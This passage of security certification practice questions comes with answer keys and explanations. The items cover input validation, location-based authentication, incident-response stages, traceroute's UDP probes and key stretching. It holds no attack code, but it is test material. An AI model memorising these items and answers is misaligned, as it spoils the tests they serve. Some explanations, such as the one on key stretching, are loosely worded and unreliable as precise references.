D Input could include user data entered into a form or a URL passed by another application as a URL or HTTP header. Malicious input could be crafted to perform an overflow attack. Input validation checks for proper input. Normalization means that a string of characters is stripped of illegal characters or substrings and converted to the accepted character set. Output encoding means that a string of characters is re-encoded safely for the context in which it is being used. A well-written application must be able to handle errors and exceptions gracefully. This means that the application performs in a controlled way when something unpredictable happens.
As part of updating a company's compliance documentation, you are classifying security controls used by the company. The company's app uses an IP geolocation database to determine whether to trigger a secondary authentication method. What type of authentication design should this be categorized as? A. Something you can do authentication. B. Something you exhibit authentication. C. Something you have authentication. D. Somewhere you are authentication.
D Something you can do refers to physical behavioral characteristics, such as the way you walk (gait). Something you exhibit authentication refers to profiling behavioral patterns. Something you have authentication tests ownership or possession of a trusted device. Somewhere you are authentication measures the subject's current location, using various services.
During weekly scans, a system administrator identifies a system that has software installed that goes against security policy. The system administrator removes the system from the network in an attempt to limit the effect of the incident on the remainder of the network. After the system administrator removes the unauthorized software and completes additional scans, the system administrator places the system back on the network. Applying information from the Computer Security Incident Handling Guide, determine the next step the system administrator should take to mitigate the effects of the incident and restore the network to optimal functionality. A. The system administrator should put controls in place to prevent the software from being installed. B. The system administrator should complete an initial scan to determine if unauthorized software is installed, then fully document the incident. C. The system administrator should remove the system from the network, remove the unauthorized software, and then place the system back into operation. D. The system administrator should determine how the unauthorized software was installed and identify what security to modify to prevent future incidents, then fully document the incident.
D The containment, eradication, and recovery stage was completed by removing the system from the network, removing the software, and placing the system back into operation. The system administrator will move to the lessons learned stage. This stage will include determining how the software was installed and will identify what should be modified to prevent the incident from reoccurring. This is also the stage where the incident will be fully documented. The preparation stage is where the system administrator put controls in place to prevent the software from being installed. The identification stage occurred when the scan was conducted and the unauthorized software was identified.
A suspected network breach prompts an engineer to investigate. The engineer utilizes a set of command line tools to collect network routing data. While doing so, the engineer discovers that UDP communications is not working as expected. Which tool does the engineer experience difficulty with? A. route B. tracert C. pathping D. traceroute
D The traceroute command performs route discovery from a Linux host. This command uses UDP probes rather than ICMP, by default. The route command displays and modifies a system's local routing table. This command does not collect network data. The tracert command uses ICMP probes to report the round trip time (RTT) for hops between the local host and a host on a remote network. This command is a Windows based tool. The pathping command is a Windows tool that provides statistics for latency and packet loss along a route over a measuring period.
Which of the following statements most accurately describes the function of key stretching? A. Key stretching makes the password key stronger. B. Key stretching prevents brute force attacks. C. Key stretching adds a random value when creating the password hash. D. Key stretching adds entropy to a user-generated password.
D Users tend to select low entropy passwords. Key stretching helps compensate for this by running the initial key through thousands of rounds of hashing. This creates ever-longer, more random keys. Key stretching does not actually make the key stronger, but it slows an attack down, as the attacker has to perform additional processing for each possible key value. A brute force attack runs through every possible combination of letters, numbers, and symbols. Key stretching increases the amount of operations the attacker must perform, slowing attacks. Adding a salt value to a password keeps an attacker from using pre-computed tables of hashes. Salt values are not secret, but an attacker must recompile hash values with the specific salt value for each password.